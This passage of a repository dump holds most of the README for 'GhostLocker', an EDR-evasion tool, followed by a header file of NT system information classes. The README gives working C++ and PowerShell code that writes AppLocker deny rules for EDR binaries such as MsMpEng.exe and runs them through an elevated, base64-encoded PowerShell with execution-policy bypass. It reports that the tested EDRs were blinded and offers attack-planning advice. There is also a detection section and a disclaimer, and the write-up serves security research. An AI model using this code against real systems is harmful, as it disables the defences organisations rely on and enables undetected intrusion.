151 | spi.ImageName.MaximumLength = 1024;
152 | spi.ImageName.Buffer = (PWSTR)allocBuffer;
153 | 
154 | status = NtQuerySystemInformation(
155 |     SystemProcessIdInformation,
156 |     &spi,
157 |     sizeof(spi),
158 |     0
159 | );
160 | ```
161 | 
162 | **Technical Details:**
163 | - Uses undocumented `SystemProcessIdInformation` (0x58) information class
164 | - Returns NT device path format: `\Device\HarddiskVolume3\Windows\System32\...`
165 | - Requires conversion to Win32 path format for AppLocker compatibility
166 | 
167 | **Path Conversion Logic:**
168 | ```cpp
169 | std::wstring ForceHarddiskVolumeToC(const std::wstring& ntPath)
170 | {
171 |     const std::wstring prefix = L"\\Device\\HarddiskVolume3\\";
172 |     if (ntPath.rfind(prefix, 0) == 0)
173 |     {
174 |         std::wstring rest = ntPath.substr(prefix.length());
175 |         return L"C:\\" + rest;
176 |     }
177 |     return ntPath;
178 | }
179 | ```
180 | 
181 | **Limitation:** Hardcoded `HarddiskVolume3` assumption. Should be improved to dynamically resolve volume numbers.
182 | 
183 | #### 3. PowerShell Policy Generation
184 | 
185 | The tool embeds a complete PowerShell script that:
186 | 
187 | **a) Validates Target Paths**
188 | ```powershell
189 | foreach ($exe in $ExeToBlock) {
190 |     if (!(Test-Path $exe)) {
191 |         Write-Host '[!] ERROR: File does not exist:' $exe -ForegroundColor Red
192 |         exit 1
193 |     }
194 | }
195 | ```
196 | 
197 | **b) Generates Dynamic Deny Rules**
198 | ```powershell
199 | foreach ($exe in $ExeToBlock) {
200 |     $id   = [guid]::NewGuid().ToString()
201 |     $name = Split-Path $exe -Leaf
202 |     
203 |     $dynamicBlockRules += '<FilePathRule Id="' + $id + '" Name="Block ' + $name + 
204 |                           '" Description="Blocked by policy" UserOrGroupSid="S-1-1-0" Action="Deny">'
205 |     $dynamicBlockRules += '<Conditions><FilePathCondition Path="' + $exe + '" /></Conditions>'
206 |     $dynamicBlockRules += '</FilePathRule>'
207 | }
208 | ```
209 | 
210 | **Key Policy Elements:**
211 | - `UserOrGroupSid="S-1-1-0"`: Applies to Everyone (all users)
212 | - `Action="Deny"`: Explicit block rule
213 | - `EnforcementMode="Enabled"`: Active enforcement for EXE rules
214 | - Deny rules inserted before fallback allow rules (precedence)
215 | 
216 | **c) Policy Application**
217 | ```powershell
218 | Set-AppLockerPolicy -XmlPolicy $tempPath -ErrorAction Stop
219 | gpupdate /force | Out-Null
220 | ```
221 | 
222 | #### 4. Base64 Encoding and Execution
223 | 
224 | ```cpp
225 | void RunPowerShellInMemory()
226 | {
227 |     std::wstring script = BuildFullPowerShellScript();
228 |     const BYTE* bytes = reinterpret_cast<const BYTE*>(script.c_str());
229 |     size_t byteLen = script.size() * sizeof(wchar_t);
230 |     
231 |     std::wstring encoded = Base64Encode(bytes, byteLen);
232 |     std::wstring params = L"-NoProfile -ExecutionPolicy Bypass -EncodedCommand ";
233 |     params += encoded;
234 |     
235 |     ShellExecuteW(NULL, L"runas", L"powershell.exe", params.c_str(), NULL, SW_SHOW);
236 | }
237 | ```
238 | 
239 | **Technical Reasoning:**
240 | - **UTF-16LE encoding**: PowerShell `-EncodedCommand` expects UTF-16LE
241 | - **Base64 encoding**: Bypasses command-line character restrictions
242 | - **`-ExecutionPolicy Bypass`**: Ignores script execution policy
243 | - **`runas` verb**: Triggers UAC elevation for administrative rights
244 | 
245 | #### `main_improved.cpp` – Static Wildcard-Based Version
246 | After clarification from **diversenok**, it became clear that AppLocker path rules support wildcard matching and do not require full executable paths.
247 | 
248 | This improved version removes all process enumeration and native path resolution logic and instead relies on static wildcard rules such as: `*\MsMpEng.exe`
249 | 
250 | ---
251 | 
252 | ## Requirements
253 | 
254 | ⚠️ **Prerequisites for Successful Deployment:**
255 | 
256 | - Must execute from elevated (Administrator) context
257 | - AppIDSvc service must be running: `sc start AppIDSvc`
258 | - System reboot required post-deployment for full effectiveness
259 | - Target EDR processes must be running during enumeration phase
260 | 
261 | ---
262 | 
263 | ## Research Results: Real-World EDR Testing
264 | 
265 | ### Testing Methodology
266 | 
267 | Extensive controlled testing was conducted against multiple commercial EDR solutions to evaluate effectiveness.
268 | 
269 | **Test Environment:**
270 | - Windows 11 (25H2)
271 | - Multiple commercial EDR products (names withheld)
272 | - Baseline detection: simple process injection techniques
273 | - Pre-test verification: confirmed EDR detection capabilities
274 | 
275 | ### Key Findings
276 | 
277 | #### Detection Capabilities Post-Block
278 | 
279 | **Behavioral Analysis Failure:**
280 | - All tested EDR solutions failed to generate alerts after AppLocker blocking
281 | - Previously-detected simple injections went undetected
282 | - No behavioral detections triggered for suspicious activities
283 | 
284 | **Management Console Perspective:**
285 | - Agents continued reporting as "online" and "protected"
286 | - Last-seen timestamps updated normally
287 | - **No indication of compromise from management interface**
288 | 
289 | #### Kernel Driver Telemetry Analysis
290 | 
291 | Despite kernel drivers continuing to run and collect telemetry data streams, the absence of userland processing components rendered collected data ineffective.
292 | 
293 | **What Continues Working:**
294 | - Kernel callbacks fire normally (process, thread, image load, registry, etc.)
295 | - Raw telemetry data collection persists
296 | - Driver-to-driver communication may function
297 | 
298 | 
299 | **Critical Insight:**
300 | 
301 | Modern EDR architecture relies on a tight coupling between kernel drivers and userland analysis engines. 
302 | Breaking this coupling effectively blinds the EDR despite continued telemetry collection.
303 | 
304 | **Screenshot (Enumerating and applying the AppLocker-Policy):**
305 | <img width="3102" height="1237" alt="Screenshot 2025-12-09 153050" src="https://github.com/user-attachments/assets/c7d0cf80-5ecf-4e83-a80c-535f4be88d8c" />
306 | 
307 | **Screenshot (Deactivated WinDefend):**
308 | 
309 | 
310 | <img width="785" height="562" alt="Screenshot 2025-12-10 092525" src="https://github.com/user-attachments/assets/962ba689-61a3-4a19-8802-4f60335b7c8b" />
311 | 
312 | 
313 | <img width="1242" height="927" alt="Screenshot 2025-12-10 123246" src="https://github.com/user-attachments/assets/eb358319-9450-4a34-9c1a-0d37423e814c" />
314 | 
315 | 
316 | **Screenshot of Version 2**
317 | <img width="2192" height="517" alt="Screenshot 2025-12-19 152900" src="https://github.com/user-attachments/assets/90a92441-9a7b-415c-b246-95c4f3e3316e" />
318 | 
319 | ---
320 | 
321 | ## Comparison: WDAC vs. AppLocker
322 | 
323 | ### What is WDAC?
324 | 
325 | Windows Defender Application Control (WDAC) was introduced in Windows 10 and represents Microsoft's modern application control framework. 
326 | It enforces policies on both user-mode and kernel-mode binaries.
327 | 
328 | #### WDAC Architecture:
329 | 
330 | **Core Characteristics:**
331 | - System-wide enforcement (all users, all sessions)
332 | - Pre-boot enforcement
333 | - Default-deny model
334 | - Code Integrity (CI) policy engine
335 | - Kernel driver signing enforcement
336 | 
337 | **WDAC Policy Storage:**
338 | ```
339 | C:\Windows\System32\CodeIntegrity\SIPolicy.p7b    (Active policy, signed)
340 | C:\Windows\System32\CodeIntegrity\CIPolicies\     (Multiple policies)
341 | EFI System Partition (UEFI enforcement)
342 | ```
343 | 
344 | ### WDAC as Attack Vector: Krueger
345 | 
346 | [Krueger](https://github.com/logangoins/Krueger) demonstrated WDAC abuse for EDR driver blocking:
347 | 
348 | 
349 | **Key Difference:**
350 | - WDAC blocks at **driver load time** (kernel)
351 | - AppLocker blocks at **process creation time** (userland)
352 | 
353 | ### Detailed Comparison Matrix
354 | 
355 | | Feature | AppLocker | WDAC |
356 | |---------|-----------|------|
357 | | **Enforcement Scope** | User-mode executables only | User-mode + kernel-mode drivers |
358 | | **Enforcement Timing** | Process creation | Boot + runtime |
359 | | **User Granularity** | Per-user/group rules | System-wide  |
360 | | **Default Mode** | Allow-by-default | Deny-by-default |
361 | | **Rule Types** | Path, Hash, Publisher | Hash, Publisher, WHQLFile, Version |
362 | | **Blocks Drivers** | ❌ No | ✅ Yes |
363 | | **Policy Complexity** | Moderate | High |
364 | | **Audit Mode** | ✅ Yes | ✅ Yes |
365 | 
366 | 
367 | ### Practical Attack Considerations
368 | 
369 | **When to Use AppLocker (GhostLocker):**
370 | - Goal is userland process blocking only
371 | - Want to maintain kernel driver telemetry (less suspicious)
372 | - Need user-scoped policies for targeted blocking
373 | 
374 | **When to Use WDAC (Krueger-style):**
375 | - Need complete driver-level blocking
376 | - Target has no WDAC enforcement
377 | 
378 | ---
379 | ## Detection & Prevention Guidance
380 | 
381 | ### 1. Pre-Execution Policy Evaluation
382 | 
383 | Windows provides the `Get-AppLockerFileInformation` API, which allows testing whether a specific executable would be blocked under the current AppLocker policy.
384 | 
385 | An EDR can use this mechanism to proactively verify whether its own binaries or services would be denied execution after a policy change.  
386 | If a core component transitions from allowed to denied, this should be treated as a high-confidence tamper condition.
387 | 
388 | ### 2. AppLocker Policy Change Monitoring
389 | 
390 | AppLocker policy updates are communicated to `AppID.sys` via explicit IOCTL calls from user mode.  
391 | This provides a clear signal path indicating that enforcement state has changed.
392 | 
393 | Kernel drivers can observe these notifications and correlate them with subsequent execution failures of protected services, enabling accurate detection of policy-based neutralization.
394 | 
395 | ### 3. Persistence and Reboot Correlation
396 | 
397 | AppLocker policies are persisted across reboots in well-defined registry locations.  
398 | EDR solutions can snapshot relevant policy state before reboot and verify enforcement consistency after system startup.
399 | 
400 | A mismatch between expected execution state and post-reboot enforcement strongly indicates intentional policy manipulation.
401 | 
402 | ### 4. Built-in Exclusion Mechanisms
403 | 
404 | Windows includes native mechanisms for excluding processes from SRP/AppLocker enforcement.  
405 | Security products are expected to integrate with these mechanisms to ensure operational continuity.
406 | 
407 | Failure to account for these exclusions is not a limitation of AppLocker, but rather an architectural oversight in the protected product.
408 | 
409 | ### Summary
410 | 
411 | None of these detection strategies require bypassing AppLocker or violating Windows security boundaries.  
412 | They rely solely on documented behavior and interfaces already provided by the operating system.
413 | 
414 | ---
415 | ## Conclusion
416 | 
417 | **GhostLocker** demonstrates that AppLocker, a legitimate Windows security feature, can be weaponized to neutralize EDR solutions through userland process blocking. 
418 | This research highlights fundamental architectural vulnerabilities in current EDR designs that tightly couple kernel telemetry collection with userland analysis engines.
419 | 
420 | ### Key Takeaways:
421 | 
422 | 1. **AppLocker Effectiveness**: Successfully blocks EDR userland processes across multiple vendors
423 | 2. **Architectural Vulnerability**: Kernel drivers continue running but become functionally blind without userland processing
424 | 3. **Detection Blindness**: Tested EDRs showed complete detection failure post-blocking
425 | 4. **Management Console Deception**: Agents appear "online" and "protected" despite compromise
426 | 5. **System-Native Technique**: Uses legitimate Windows features
427 | 
428 | ### For future a C# Implementation:
429 | 
430 | - Pure .NET in-memory execution (better OPSEC)
431 | - Direct API usage without PowerShell dependencies
432 | 
433 | ---
434 | 
435 | 
436 | ## Disclaimer
437 | 
438 | This research is provided for **educational and defensive security purposes only**. 
439 | The techniques described should only be used in authorized testing environments with explicit permission. 
440 | 
441 | ---
442 | 
443 | ## References & Further Reading
444 | 
445 | - [Windows Internals, Part 1 & 2 (7th Edition)](https://www.microsoftpressstore.com/store/windows-internals-part-1-system-architecture-processes-9780735684188)
446 | - [AppLocker Technical Reference](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/applocker-overview)
447 | - [WDAC Design Guide](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/windows-defender-application-control-design-guide)
448 | - [Krueger: WDAC Abuse Tool](https://github.com/logangoins/Krueger)
449 | 
450 | 
451 | ---
452 | 
453 | ## Community Contributions Welcome
454 | 
455 | If you are interested in contributing to **GhostLocker**, especially to the C# implementation, you are very welcome.
456 | 
457 | ---
458 | 


--------------------------------------------------------------------------------
/ntdefs.h:
--------------------------------------------------------------------------------
  1 | #pragma once
  2 | 
  3 | 
  4 | typedef struct _UNICODE_STRING
  5 | {
  6 |     USHORT Length;
  7 |     USHORT MaximumLength;
  8 |     _Field_size_bytes_part_opt_(MaximumLength, Length) PWCH Buffer;
  9 | } UNICODE_STRING, * PUNICODE_STRING;
 10 | 
 11 | typedef struct SYSTEM_PROCESS_ID_INFORMATION
 12 | {
 13 |     ULONGLONG ProcessId;
 14 |     UNICODE_STRING ImageName;
 15 | } *PSYSTEM_PROCESS_ID_INFORMATION;
 16 | 
 17 | 
 18 | //
 19 | // System Information
 20 | //
 21 | 
 22 | // rev
 23 | // private
 24 | typedef enum _SYSTEM_INFORMATION_CLASS
 25 | {
 26 |     SystemBasicInformation,                                 // q: SYSTEM_BASIC_INFORMATION
 27 |     SystemProcessorInformation,                             // q: SYSTEM_PROCESSOR_INFORMATION
 28 |     SystemPerformanceInformation,                           // q: SYSTEM_PERFORMANCE_INFORMATION
 29 |     SystemTimeOfDayInformation,                             // q: SYSTEM_TIMEOFDAY_INFORMATION
 30 |     SystemPathInformation,                                  // q: not implemented
 31 |     SystemProcessInformation,                               // q: SYSTEM_PROCESS_INFORMATION
 32 |     SystemCallCountInformation,                             // q: SYSTEM_CALL_COUNT_INFORMATION
 33 |     SystemDeviceInformation,                                // q: SYSTEM_DEVICE_INFORMATION
 34 |     SystemProcessorPerformanceInformation,                  // q: SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION (EX in: USHORT ProcessorGroup)
 35 |     SystemFlagsInformation,                                 // qs: SYSTEM_FLAGS_INFORMATION
 36 |     SystemCallTimeInformation,                              // q: SYSTEM_CALL_TIME_INFORMATION // not implemented // 10
 37 |     SystemModuleInformation,                                // q: RTL_PROCESS_MODULES
 38 |     SystemLocksInformation,                                 // q: RTL_PROCESS_LOCKS
 39 |     SystemStackTraceInformation,                            // q: RTL_PROCESS_BACKTRACES
 40 |     SystemPagedPoolInformation,                             // q: not implemented
 41 |     SystemNonPagedPoolInformation,                          // q: not implemented
 42 |     SystemHandleInformation,                                // q: SYSTEM_HANDLE_INFORMATION
 43 |     SystemObjectInformation,                                // q: SYSTEM_OBJECTTYPE_INFORMATION mixed with SYSTEM_OBJECT_INFORMATION
 44 |     SystemPageFileInformation,                              // q: SYSTEM_PAGEFILE_INFORMATION
 45 |     SystemVdmInstemulInformation,                           // q: SYSTEM_VDM_INSTEMUL_INFO
 46 |     SystemVdmBopInformation,                                // q: not implemented // 20
 47 |     SystemFileCacheInformation,                             // qs: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypeSystemCache)
 48 |     SystemPoolTagInformation,                               // q: SYSTEM_POOLTAG_INFORMATION
 49 |     SystemInterruptInformation,                             // q: SYSTEM_INTERRUPT_INFORMATION (EX in: USHORT ProcessorGroup)
 50 |     SystemDpcBehaviorInformation,                           // qs: SYSTEM_DPC_BEHAVIOR_INFORMATION; s: SYSTEM_DPC_BEHAVIOR_INFORMATION (requires SeLoadDriverPrivilege)
 51 |     SystemFullMemoryInformation,                            // q: SYSTEM_MEMORY_USAGE_INFORMATION // not implemented
 52 |     SystemLoadGdiDriverInformation,                         // s: (kernel-mode only)
 53 |     SystemUnloadGdiDriverInformation,                       // s: (kernel-mode only)
 54 |     SystemTimeAdjustmentInformation,                        // qs: SYSTEM_QUERY_TIME_ADJUST_INFORMATION; s: SYSTEM_SET_TIME_ADJUST_INFORMATION (requires SeSystemtimePrivilege)
 55 |     SystemSummaryMemoryInformation,                         // q: SYSTEM_MEMORY_USAGE_INFORMATION // not implemented
 56 |     SystemMirrorMemoryInformation,                          // qs: (requires license value "Kernel-MemoryMirroringSupported") (requires SeShutdownPrivilege) // 30
 57 |     SystemPerformanceTraceInformation,                      // qs: (type depends on EVENT_TRACE_INFORMATION_CLASS)
 58 |     SystemObsolete0,                                        // q: not implemented
 59 |     SystemExceptionInformation,                             // q: SYSTEM_EXCEPTION_INFORMATION
 60 |     SystemCrashDumpStateInformation,                        // s: SYSTEM_CRASH_DUMP_STATE_INFORMATION (requires SeDebugPrivilege)
 61 |     SystemKernelDebuggerInformation,                        // q: SYSTEM_KERNEL_DEBUGGER_INFORMATION
 62 |     SystemContextSwitchInformation,                         // q: SYSTEM_CONTEXT_SWITCH_INFORMATION
 63 |     SystemRegistryQuotaInformation,                         // qs: SYSTEM_REGISTRY_QUOTA_INFORMATION; s (requires SeIncreaseQuotaPrivilege)
 64 |     SystemExtendServiceTableInformation,                    // s: (requires SeLoadDriverPrivilege) // loads win32k only
 65 |     SystemPrioritySeparation,                               // s: (requires SeTcbPrivilege)
 66 |     SystemVerifierAddDriverInformation,                     // s: UNICODE_STRING (requires SeDebugPrivilege) // 40
 67 |     SystemVerifierRemoveDriverInformation,                  // s: UNICODE_STRING (requires SeDebugPrivilege)
 68 |     SystemProcessorIdleInformation,                         // q: SYSTEM_PROCESSOR_IDLE_INFORMATION (EX in: USHORT ProcessorGroup)
 69 |     SystemLegacyDriverInformation,                          // q: SYSTEM_LEGACY_DRIVER_INFORMATION
 70 |     SystemCurrentTimeZoneInformation,                       // qs: RTL_TIME_ZONE_INFORMATION
 71 |     SystemLookasideInformation,                             // q: SYSTEM_LOOKASIDE_INFORMATION
 72 |     SystemTimeSlipNotification,                             // s: HANDLE (NtCreateEvent) (requires SeSystemtimePrivilege)
 73 |     SystemSessionCreate,                                    // q: not implemented
 74 |     SystemSessionDetach,                                    // q: not implemented
 75 |     SystemSessionInformation,                               // q: not implemented (SYSTEM_SESSION_INFORMATION)
 76 |     SystemRangeStartInformation,                            // q: SYSTEM_RANGE_START_INFORMATION // 50
 77 |     SystemVerifierInformation,                              // qs: SYSTEM_VERIFIER_INFORMATION; s (requires SeDebugPrivilege)
 78 |     SystemVerifierThunkExtend,                              // qs: (kernel-mode only)
 79 |     SystemSessionProcessInformation,                        // q: SYSTEM_SESSION_PROCESS_INFORMATION
 80 |     SystemLoadGdiDriverInSystemSpace,                       // qs: SYSTEM_GDI_DRIVER_INFORMATION (kernel-mode only) (same as SystemLoadGdiDriverInformation)
 81 |     SystemNumaProcessorMap,                                 // q: SYSTEM_NUMA_INFORMATION
 82 |     SystemPrefetcherInformation,                            // qs: PREFETCHER_INFORMATION // PfSnQueryPrefetcherInformation
 83 |     SystemExtendedProcessInformation,                       // q: SYSTEM_EXTENDED_PROCESS_INFORMATION
 84 |     SystemRecommendedSharedDataAlignment,                   // q: ULONG // KeGetRecommendedSharedDataAlignment
 85 |     SystemComPlusPackage,                                   // qs: ULONG
 86 |     SystemNumaAvailableMemory,                              // q: SYSTEM_NUMA_INFORMATION // 60
 87 |     SystemProcessorPowerInformation,                        // q: SYSTEM_PROCESSOR_POWER_INFORMATION (EX in: USHORT ProcessorGroup)
 88 |     SystemEmulationBasicInformation,                        // q: SYSTEM_BASIC_INFORMATION
 89 |     SystemEmulationProcessorInformation,                    // q: SYSTEM_PROCESSOR_INFORMATION
 90 |     SystemExtendedHandleInformation,                        // q: SYSTEM_HANDLE_INFORMATION_EX
 91 |     SystemLostDelayedWriteInformation,                      // q: ULONG
 92 |     SystemBigPoolInformation,                               // q: SYSTEM_BIGPOOL_INFORMATION
 93 |     SystemSessionPoolTagInformation,                        // q: SYSTEM_SESSION_POOLTAG_INFORMATION
 94 |     SystemSessionMappedViewInformation,                     // q: SYSTEM_SESSION_MAPPED_VIEW_INFORMATION
 95 |     SystemHotpatchInformation,                              // qs: SYSTEM_HOTPATCH_CODE_INFORMATION
 96 |     SystemObjectSecurityMode,                               // q: ULONG // 70
 97 |     SystemWatchdogTimerHandler,                             // s: SYSTEM_WATCHDOG_HANDLER_INFORMATION // (kernel-mode only)
 98 |     SystemWatchdogTimerInformation,                         // qs: out: SYSTEM_WATCHDOG_TIMER_INFORMATION (EX in: ULONG WATCHDOG_INFORMATION_CLASS) // NtQuerySystemInformationEx
 99 |     SystemLogicalProcessorInformation,                      // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION (EX in: USHORT ProcessorGroup) // NtQuerySystemInformationEx
100 |     SystemWow64SharedInformationObsolete,                   // q: not implemented
101 |     SystemRegisterFirmwareTableInformationHandler,          // s: SYSTEM_FIRMWARE_TABLE_HANDLER // (kernel-mode only)
102 |     SystemFirmwareTableInformation,                         // q: SYSTEM_FIRMWARE_TABLE_INFORMATION
103 |     SystemModuleInformationEx,                              // q: RTL_PROCESS_MODULE_INFORMATION_EX // since VISTA
104 |     SystemVerifierTriageInformation,                        // q: not implemented
105 |     SystemSuperfetchInformation,                            // qs: SUPERFETCH_INFORMATION // PfQuerySuperfetchInformation
106 |     SystemMemoryListInformation,                            // q: SYSTEM_MEMORY_LIST_INFORMATION; s: SYSTEM_MEMORY_LIST_COMMAND (requires SeProfileSingleProcessPrivilege) // 80
107 |     SystemFileCacheInformationEx,                           // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (same as SystemFileCacheInformation)
108 |     SystemThreadPriorityClientIdInformation,                // s: SYSTEM_THREAD_CID_PRIORITY_INFORMATION (requires SeIncreaseBasePriorityPrivilege) // NtQuerySystemInformationEx
109 |     SystemProcessorIdleCycleTimeInformation,                // q: SYSTEM_PROCESSOR_IDLE_CYCLE_TIME_INFORMATION[] (EX in: USHORT ProcessorGroup) // NtQuerySystemInformationEx
110 |     SystemVerifierCancellationInformation,                  // q: SYSTEM_VERIFIER_CANCELLATION_INFORMATION // name:wow64:whNT32QuerySystemVerifierCancellationInformation
111 |     SystemProcessorPowerInformationEx,                      // q: not implemented
112 |     SystemRefTraceInformation,                              // qs: SYSTEM_REF_TRACE_INFORMATION // ObQueryRefTraceInformation
113 |     SystemSpecialPoolInformation,                           // qs: SYSTEM_SPECIAL_POOL_INFORMATION (requires SeDebugPrivilege) // MmSpecialPoolTag, then MmSpecialPoolCatchOverruns != 0
114 |     SystemProcessIdInformation,                             // q: SYSTEM_PROCESS_ID_INFORMATION
115 |     SystemErrorPortInformation,                             // s: (requires SeTcbPrivilege)
116 |     SystemBootEnvironmentInformation,                       // q: SYSTEM_BOOT_ENVIRONMENT_INFORMATION // 90
117 |     SystemHypervisorInformation,                            // q: SYSTEM_HYPERVISOR_QUERY_INFORMATION
118 |     SystemVerifierInformationEx,                            // qs: SYSTEM_VERIFIER_INFORMATION_EX
119 |     SystemTimeZoneInformation,                              // qs: RTL_TIME_ZONE_INFORMATION (requires SeTimeZonePrivilege)
120 |     SystemImageFileExecutionOptionsInformation,             // s: SYSTEM_IMAGE_FILE_EXECUTION_OPTIONS_INFORMATION (requires SeTcbPrivilege)
121 |     SystemCoverageInformation,                              // q: COVERAGE_MODULES s: COVERAGE_MODULE_REQUEST // ExpCovQueryInformation (requires SeDebugPrivilege)
122 |     SystemPrefetchPatchInformation,                         // q: SYSTEM_PREFETCH_PATCH_INFORMATION
123 |     SystemVerifierFaultsInformation,                        // s: SYSTEM_VERIFIER_FAULTS_INFORMATION (requires SeDebugPrivilege)
124 |     SystemSystemPartitionInformation,                       // q: SYSTEM_SYSTEM_PARTITION_INFORMATION
125 |     SystemSystemDiskInformation,                            // q: SYSTEM_SYSTEM_DISK_INFORMATION
126 |     SystemProcessorPerformanceDistribution,                 // q: SYSTEM_PROCESSOR_PERFORMANCE_DISTRIBUTION (EX in: USHORT ProcessorGroup) // NtQuerySystemInformationEx // 100
127 |     SystemNumaProximityNodeInformation,                     // qs: SYSTEM_NUMA_PROXIMITY_MAP
128 |     SystemDynamicTimeZoneInformation,                       // qs: RTL_DYNAMIC_TIME_ZONE_INFORMATION (requires SeTimeZonePrivilege)
129 |     SystemCodeIntegrityInformation,                         // q: SYSTEM_CODEINTEGRITY_INFORMATION // SeCodeIntegrityQueryInformation
130 |     SystemProcessorMicrocodeUpdateInformation,              // s: SYSTEM_PROCESSOR_MICROCODE_UPDATE_INFORMATION (requires SeLoadDriverPrivilege)
131 |     SystemProcessorBrandString,                             // q: CHAR[] // HaliQuerySystemInformation -> HalpGetProcessorBrandString, info class 23
132 |     SystemVirtualAddressInformation,                        // q: SYSTEM_VA_LIST_INFORMATION[]; s: SYSTEM_VA_LIST_INFORMATION[] (requires SeIncreaseQuotaPrivilege) // MmQuerySystemVaInformation
133 |     SystemLogicalProcessorAndGroupInformation,              // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION_EX (EX in: LOGICAL_PROCESSOR_RELATIONSHIP RelationshipType) // since WIN7 // NtQuerySystemInformationEx // KeQueryLogicalProcessorRelationship
134 |     SystemProcessorCycleTimeInformation,                    // q: SYSTEM_PROCESSOR_CYCLE_TIME_INFORMATION[] (EX in: USHORT ProcessorGroup) // NtQuerySystemInformationEx
135 |     SystemStoreInformation,                                 // qs: SYSTEM_STORE_INFORMATION (requires SeProfileSingleProcessPrivilege) // SmQueryStoreInformation
136 |     SystemRegistryAppendString,                             // s: SYSTEM_REGISTRY_APPEND_STRING_PARAMETERS // 110
137 |     SystemAitSamplingValue,                                 // s: ULONG (requires SeProfileSingleProcessPrivilege)
138 |     SystemVhdBootInformation,                               // q: SYSTEM_VHD_BOOT_INFORMATION
139 |     SystemCpuQuotaInformation,                              // qs: PS_CPU_QUOTA_QUERY_INFORMATION
140 |     SystemNativeBasicInformation,                           // q: SYSTEM_BASIC_INFORMATION
141 |     SystemErrorPortTimeouts,                                // q: SYSTEM_ERROR_PORT_TIMEOUTS
142 |     SystemLowPriorityIoInformation,                         // q: SYSTEM_LOW_PRIORITY_IO_INFORMATION
143 |     SystemTpmBootEntropyInformation,                        // q: BOOT_ENTROPY_NT_RESULT // ExQueryBootEntropyInformation
144 |     SystemVerifierCountersInformation,                      // q: SYSTEM_VERIFIER_COUNTERS_INFORMATION
145 |     SystemPagedPoolInformationEx,                           // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypePagedPool)
146 |     SystemSystemPtesInformationEx,                          // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypeSystemPtes) // 120
147 |     SystemNodeDistanceInformation,                          // q: USHORT[4*NumaNodes] // (EX in: USHORT NodeNumber) // NtQuerySystemInformationEx
148 |     SystemAcpiAuditInformation,                             // q: SYSTEM_ACPI_AUDIT_INFORMATION // HaliQuerySystemInformation -> HalpAuditQueryResults, info class 26
149 |     SystemBasicPerformanceInformation,                      // q: SYSTEM_BASIC_PERFORMANCE_INFORMATION // name:wow64:whNtQuerySystemInformation_SystemBasicPerformanceInformation
150 |     SystemQueryPerformanceCounterInformation,               // q: SYSTEM_QUERY_PERFORMANCE_COUNTER_INFORMATION // since WIN7 SP1
151 |     SystemSessionBigPoolInformation,                        // q: SYSTEM_SESSION_POOLTAG_INFORMATION // since WIN8
152 |     SystemBootGraphicsInformation,                          // qs: SYSTEM_BOOT_GRAPHICS_INFORMATION (kernel-mode only)
153 |     SystemScrubPhysicalMemoryInformation,                   // qs: MEMORY_SCRUB_INFORMATION
154 |     SystemBadPageInformation,                               // q: SYSTEM_BAD_PAGE_INFORMATION
155 |     SystemProcessorProfileControlArea,                      // qs: SYSTEM_PROCESSOR_PROFILE_CONTROL_AREA
156 |     SystemCombinePhysicalMemoryInformation,                 // s: MEMORY_COMBINE_INFORMATION, MEMORY_COMBINE_INFORMATION_EX, MEMORY_COMBINE_INFORMATION_EX2 // 130
157 |     SystemEntropyInterruptTimingInformation,                // qs: SYSTEM_ENTROPY_TIMING_INFORMATION
158 |     SystemConsoleInformation,                               // qs: SYSTEM_CONSOLE_INFORMATION // (requires SeLoadDriverPrivilege)
159 |     SystemPlatformBinaryInformation,                        // q: SYSTEM_PLATFORM_BINARY_INFORMATION (requires SeTcbPrivilege)
160 |     SystemPolicyInformation,                                // q: SYSTEM_POLICY_INFORMATION (Warbird/Encrypt/Decrypt/Execute)
161 |     SystemHypervisorProcessorCountInformation,              // q: SYSTEM_HYPERVISOR_PROCESSOR_COUNT_INFORMATION
162 |     SystemDeviceDataInformation,                            // q: SYSTEM_DEVICE_DATA_INFORMATION
163 |     SystemDeviceDataEnumerationInformation,                 // q: SYSTEM_DEVICE_DATA_INFORMATION
164 |     SystemMemoryTopologyInformation,                        // q: SYSTEM_MEMORY_TOPOLOGY_INFORMATION
165 |     SystemMemoryChannelInformation,                         // q: SYSTEM_MEMORY_CHANNEL_INFORMATION
166 |     SystemBootLogoInformation,                              // q: SYSTEM_BOOT_LOGO_INFORMATION // 140
167 |     SystemProcessorPerformanceInformationEx,                // q: SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION_EX // (EX in: USHORT ProcessorGroup) // NtQuerySystemInformationEx // since WINBLUE
168 |     SystemCriticalProcessErrorLogInformation,               // q: CRITICAL_PROCESS_EXCEPTION_DATA
169 |     SystemSecureBootPolicyInformation,                      // q: SYSTEM_SECUREBOOT_POLICY_INFORMATION
170 |     SystemPageFileInformationEx,                            // q: SYSTEM_PAGEFILE_INFORMATION_EX
171 |     SystemSecureBootInformation,                            // q: SYSTEM_SECUREBOOT_INFORMATION
172 |     SystemEntropyInterruptTimingRawInformation,             // qs: SYSTEM_ENTROPY_TIMING_INFORMATION
173 |     SystemPortableWorkspaceEfiLauncherInformation,          // q: SYSTEM_PORTABLE_WORKSPACE_EFI_LAUNCHER_INFORMATION
174 |     SystemFullProcessInformation,                           // q: SYSTEM_EXTENDED_PROCESS_INFORMATION with SYSTEM_PROCESS_INFORMATION_EXTENSION (requires admin)
175 |     SystemKernelDebuggerInformationEx,                      // q: SYSTEM_KERNEL_DEBUGGER_INFORMATION_EX
176 |     SystemBootMetadataInformation,                          // q: (requires SeTcbPrivilege) // 150
177 |     SystemSoftRebootInformation,                            // q: ULONG
178 |     SystemElamCertificateInformation,                       // s: SYSTEM_ELAM_CERTIFICATE_INFORMATION
179 |     SystemOfflineDumpConfigInformation,                     // q: OFFLINE_CRASHDUMP_CONFIGURATION_TABLE_V2
180 |     SystemProcessorFeaturesInformation,                     // q: SYSTEM_PROCESSOR_FEATURES_INFORMATION
181 |     SystemRegistryReconciliationInformation,                // s: NULL (requires admin) (flushes registry hives)
182 |     SystemEdidInformation,                                  // q: SYSTEM_EDID_INFORMATION
